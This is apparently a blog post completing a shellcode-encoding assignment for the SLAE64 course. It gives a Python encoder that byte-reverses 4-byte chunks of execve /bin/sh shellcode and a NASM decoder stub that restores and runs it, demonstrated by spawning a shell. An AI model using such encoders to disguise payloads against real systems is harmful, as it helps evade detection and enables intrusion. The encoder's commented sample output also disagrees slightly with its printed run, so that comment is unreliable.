Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification. The task for 4/7 assignment is to create a custom encoding scheme like shown in the course’s Insertion encoder chapter. The encoding scheme should be used on the execve-stack shellcode implemented during the course and then executed.

Student ID: SLAE64 - 1594

Encoding scheme

I decided to implement an encoding scheme where I would divide the shellcode into 4 byte chunks and reverse the byte order in all of the chunks. For that to work, I also needed to check that the number of total bytes would be divisible by 4. For this I made the check in the python program code below if (length%4 != 0). If it turned out that the number of bytes of the shellcode I am using was not divisible by 4 I padded the shellcode with \x90-s as also seen on the picture below.

So the final encoder.py looks as follows:

#execve stack shellcode from SLAE64 course
import binascii

j = 3
i = 0

shellcode = "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
shellarray = bytearray(shellcode)
length = len(shellarray)
encoded = []

encoded_shellcode = shellcode.encode('hex')
input = "Input: "+ r"\x" + r"\x".join(encoded_shellcode[n:n+2] for n in range(0, len(encoded_shellcode),2))
print input

#print "Old length: %s" % length

if (length%4 != 0):
	adding = 4 -(length%4)
	for i in range (adding):
		shellarray.append(0x90)

#print "New length with \\x90-s appended: %s" % len(shellarray)

#changing positions
while(j <= len(shellarray)):
	for i in range(4):
		encoded.append(shellarray[j-i])
	j = j + 4

output = binascii.hexlify(bytearray(encoded))
result = "Output (\\xXX format):" + r"\x" + r"\x".join(output[n : n+2] for n in range(0, len(output), 2))
print result
result2 = "Output (0xXX format): " + r"0x" + r",0x".join(output[n : n+2] for n in range(0, len(output), 2))
print result2



# Input: \x48\x31\xc0\x50 \x48\xbb\x2f\x62 \x69\x6e\x2f\x73 \x68\x53\x48\x89 \xe7\x50\x48\x89 \xe2\x57\x48\x89 \xe6\x48\x83\xc0 \x3b\x0f\x05
# Output \x50\xc0\x31\x48 \x62\x2f\xbb\x48 \x73\x2f\x6e\x69 \x89\x48\x53\x68 \x89\x48\x50\xe7 \x89\x48\x57\xe2 \xc0\x83\x48\xe6 \x90\x05\x0f\x3b

Output:

$ python ./encoder.py
Input: \x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05
Output (\xXX format):\x50\xc0\x31\x48\x62\x2f\xbb\x48\x2f\x2f\x6e\x69\x48\x53\x68\x73\x48\x50\xe7\x89\x48\x57\xe2\x89\x83\x48\xe6
\x89\x05\x0f\x3b\xc0
Output (0xXX format): 0x50,0xc0,0x31,0x48,0x62,0x2f,0xbb,0x48,0x2f,0x2f,0x6e,0x69,0x48,0x53,0x68,0x73,0x48,0x50,0xe7,0x89,0x48,0x57,
0xe2,0x89,0x83,0x48,0xe6,0x89,0x05,0x0f,0x3b,0xc0

Go simple or go home - htonl()

In order for this encoder scheme to be useful for us, we should also implement the decoder stub for that particular encoding. Funnily enough I thought implementing the decoder for that would be super difficult and I would need to keep note of where I am currently in the decoded hex string, where are all the 4th*X bytes and when does the hex string end, but that turned out to be wrong assumption. One evening I was thinking of my egghunter solution where I used an access syscall for something that it was not really intended for. That funnily brought me to htonl() function in C which I have previously used to convert something to network byte order. BECAUSE … it also operates on data in 4 byte chunks and reverses the byte order. How convenient! So I made a quick example with htonl() to see what instructions it is made up of in assembly and it turned out I only needed 1 instruction bswap.

htonl.c example:

//$ gcc htonl.c -o htonl
//$ gdb ./htonl

#include <arpa/inet.h>
int main() {
  int server_fd = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in server;
  server.sin_family = AF_INET;
  server.sin_port = htonl(80808080);
  server.sin_addr.s_addr = htonl(INADDR_ANY);
  // ...
  return 0;
}

Decoder

That single instruction - bswap - turned out to be the key to an easy solve for this decoder routine. The rest of the program is built using the JCP (Jmp-CALL-Pop) technique to get the address of encoded_shellcode to RBX via pop rbx. In order to save the decoded shellcode somewhere on the stack in allocate_space I am allocating the length of shellcode worth of space and saving the beginning address of decoded shellcode to R10 for later use. In cmp section I am performing the check to see if I have reached to the end of the shellcode yet.

The decode section is undeniably the most important part here. This is where I use RBX to get the address of 1st byte in a 4-byte chunk and then iterating RCX to move from one 4-byte chunk to the next while using bswap to reverse the byte order back to its original order.

global _start

section .text

_start:

	jmp find_address

decoder:
	pop rbx                   ;get the address of the encoded_shellcode
	xor rdi, rdi
	xor rcx, RCX              ;counter

allocate_space:
	sub rsp, 0x20             ;allocate space depending on the length of your shellcode
	mov r10, rsp
	jmp decode

cmp:
	inc rcx
	cmp rcx, 0x20             ;32 - length of the shellcode
	jge decoded_shell

decode:
	mov edi, dword [rbx+rcx]
	bswap edi                 ;reverse the order of 4 bytes
	mov dword [rsp], edi
	add rcx, 4
	add rsp, 4

	loop cmp

find_address:
	call decoder

	encoded_shellcode:	db	0x50,0xc0,0x31,0x48,0x62,0x2f,0xbb,0x48,0x2f,0x2f,0x6e,0x69,0x48,
    0x53,0x68,0x73,0x48,0x50,0xe7,0x89,0x48,0x57,0xe2,0x89,0x83,0x48,0xe6,0x89,0x05,0x0f,0x3b,0xc0


decoded_shell:
	mov rsp, r10        ;get back to the top of the decoded shell on stack
	push r10        ;put the address where decoded shell resides to the top of the stack so we can ret to it
	ret
$ nasm -felf64 decoder.nasm -o decoder.o
$ ld decoder.o -o decoder
$ ./decoder

$whoami
silvia


© 2019. All rights reserved.

Powered by Hydejack v8.1.1